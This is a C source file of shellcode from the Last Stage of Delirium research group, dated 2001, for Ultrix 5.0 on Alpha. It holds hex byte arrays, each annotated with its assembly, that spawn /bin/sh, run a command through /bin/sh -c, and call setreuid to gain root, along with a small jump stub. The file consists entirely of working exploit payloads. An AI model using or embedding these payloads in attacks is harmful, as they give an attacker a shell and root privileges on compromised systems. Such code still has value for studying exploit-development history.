/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for ultrix 5.0 alpha                                           #*/

/*
syscall     %v0  %a0,%a1,%a2,%a3
----------- ---- ---------------------------------------------------------------
execv       x00b ->path="/bin/sh",->[->a0=path,0]
execv       x00b ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
setreuid    x07e ruid,euid=0
*/

#if defined(ALPHA) && defined(ULTRIX)

char shellcode[]=          /* 18*4+7 bytes                   */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)         */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)          */
    "\x40\x01\x7e\xb2"     /* stl     a3,320(sp)             */
    "\x40\x01\x9e\x22"     /* lda     a4,320(sp)             */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
    "\x80\x82\x5a\x23"     /* lda     ra,-32128(ra)          */
    "\x12\x04\xff\x47"     /* bis     zero,zero, a2          */
    "\xbb\x7d\xfa\x3b"     /* stb     zero,32187(ra)         */
    "\xb4\x7d\x1a\x22"     /* lda     a0,32180(ra)           */
    "\xc4\x7d\x1a\xb6"     /* stq     a0,32196(ra)           */
    "\xc4\x7d\x3a\x22"     /* lda     a1,32196(ra)           */
    "\xcc\x7d\xfa\xb7"     /* stq     zero,32204(ra)         */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3           */
    "\x80\x20\x7e\xb2"     /* stl     a3,8320(sp)            */
    "\x80\x20\x9e\x22"     /* lda     a4,8320(sp)            */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)           */
    "\x50\xfd\x15\x20"     /* lda     v0,-640(a5)            */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
    "/bin/sh"
;

char cmdshellcode[]=       /* 22*4+7 bytes                   */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)         */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)          */
    "\x40\x01\x7e\xb2"     /* stl     a3,320(sp)             */
    "\x40\x01\x9e\x22"     /* lda     a4,320(sp)             */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
    "\x80\x82\x5a\x23"     /* lda     ra,-32128(ra)          */
    "\xcb\x7d\xfa\x3b"     /* stb     zero,32203(ra)         */
    "\xce\x7d\xfa\x3b"     /* stb     zero,32206(ra)         */
    "\xc4\x7d\x1a\x22"     /* lda     a0,32196(ra)           */
    "\x5c\x7d\x1a\xb6"     /* stq     a0,32092(ra)           */
    "\xcc\x7d\x7a\x22"     /* lda     a3,32204(ra)           */
    "\x64\x7d\x7a\xb6"     /* stq     a3,32100(ra)           */
    "\xd0\x7d\x7a\x22"     /* lda     a3,32208(ra)           */
    "\x6c\x7d\x7a\xb6"     /* stq     a3,32108(ra)           */
    "\x74\x7d\xfa\xb7"     /* stq     zero,32116(ra)         */
    "\x5c\x7d\x3a\x22"     /* lda     a1,32092(ra)           */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3           */
    "\x80\x20\x7e\xb2"     /* stl     a3,8320(sp)            */
    "\x80\x20\x9e\x22"     /* lda     a4,8320(sp)            */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)           */
    "\x50\xfd\x15\x20"     /* lda     v0,-688(a5)            */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
    "/bin/sh -c  "
;

char setreuidcode[]=       /* 11*4 bytes                     */
    "\xff\xff\x1f\x22"     /* lda     a0,-1(zero)            */
    "\x11\x04\xff\x47"     /* bis     zero,zero,a1           */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)           */
    "\xc3\xfd\x15\x20"     /* lda     v0,-573(a5)            */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3           */
    "\x80\x02\x7e\xb2"     /* stl     a3,640(sp)             */
    "\x80\x02\x9e\x22"     /* lda     a4,640(sp)             */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)         */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)          */
    "\x84\x02\x7e\xb2"     /* stl     a3,644(sp)             */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10           */
;

char jump[]=
    "\00\x40\xde\x47"      /* bis     sp,sp,v0               */
    "\01\x80\xfa\x6b"      /* ret     zero,(ra),1            */
;

#endif
